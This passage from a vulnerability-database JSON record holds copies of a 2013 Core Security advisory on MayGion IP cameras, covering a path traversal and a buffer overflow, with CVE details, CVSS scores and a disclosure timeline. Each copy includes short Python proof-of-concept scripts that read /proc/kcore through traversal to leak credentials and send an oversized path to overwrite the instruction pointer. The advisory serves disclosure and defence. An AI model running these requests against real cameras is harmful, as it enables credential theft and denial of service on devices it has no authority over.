at:\nhttp://www.coresecurity.com.\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2013 Core Security\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-10T09:47:16", "description": "MayGion IP cameras suffer from path traversal and buffer overflow vulnerabilities.", "edition": 2, "published": "2013-05-29T00:00:00", "type": "zdt", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-29T00:00:00", "id": "1337DAY-ID-20823", "href": "https://0day.today/exploit/description/20823", "sourceData": "MayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20823"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:29", "description": "", "published": "2013-05-28T00:00:00", "type": "packetstorm", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1605", "CVE-2013-1604"], "modified": "2013-05-28T00:00:00", "id": "PACKETSTORM:121787", "href": "https://packetstormsecurity.com/files/121787/MayGion-IP-Camera-Path-Traversal-Buffer-Overflow.html", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMayGion IP Cameras multiple vulnerabilities \n \n1. *Advisory Information* \n \nTitle: MayGion IP Cameras multiple vulnerabilities \nAdvisory ID: CORE-2013-0322 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities \nDate published: 2013-05-28 \nDate of last update: 2013-05-28 \nVendors contacted: MayGion \nRelease mode: Coordinated release \n \n2. *Vulnerability Information* \n \nClass: Path traversal [CWE-22], Buffer overflow [CWE-119] \nImpact: Code execution, Security bypass \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2013-1604, CVE-2013-1605 \n \n3. *Vulnerability Description* \n \nMultiple vulnerabilities have been found in MayGion IP cameras [1] based \non firmware v09.27 and below, that could allow an unauthenticated remote \nattacker: \n \n1. [CVE-2013-1604] to dump the camera's memory and retrieve user \ncredentials, \n2. [CVE-2013-1605] to execute arbitrary code. \n \n4. *Vulnerable Packages* \n \n. MayGion IP cameras based on firmware 2011.27.09. \n. Other firmware versions are probably affected too but they were not \nchecked. \n \n5. *Non-Vulnerable Packages* \n \n. H.264 ipcam firmware 2013.04.22. \n \n6. *Credits* \n \nThese vulnerabilities were discovered and researched by Nahuel Riva and \nFrancisco Falcon from Core Exploit Writers Team. \n \n7. *Technical Description / Proof of Concept Code* \n \n7.1. *User Credentials Leaked via Path Traversal* \n \n[CVE-2013-1604] The following Python code exploits a path traversal and \ndumps the camera's memory. Valid user credentials can be extracted from \nthis memory dump by an unauthenticated remote attacker. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n7.2. *Buffer overflow* \n \n[CVE-2013-1605] The following Python script can be used to trigger the \nvulnerability without authentication. As a result, the Instruction \nPointer register (IP) will be overwritten with 0x61616161, which is a \ntypical buffer overrun condition. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n8. *Report Timeline* \n \n. 2013-05-02: \nCore Security Technologies notifies MayGion of the vulnerabilities. \nPublication date is set for May 29th, 2013. \n \n. 2013-05-02: \nVendor asks for a report with technical information. \n \n. 2013-05-03: \nA draft advisory containing technical details sent to MayGion team. \n \n. 2013-05-03: \nVendor notifies that all vulnerabilities were fixed in the last firmware \nversion, released April 22nd, 2013. \n \n. 2013-05-09: \nCore asks for a list of affected devices and firmware. No reply received. \n \n. 2013-05-28: \nAdvisory CORE-2013-0322 is published. \n \n9. *References* \n \n[1] http://www.maygion.com \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n11. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2013 Core Security \nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121787/CORE-2013-0322.txt"}]}
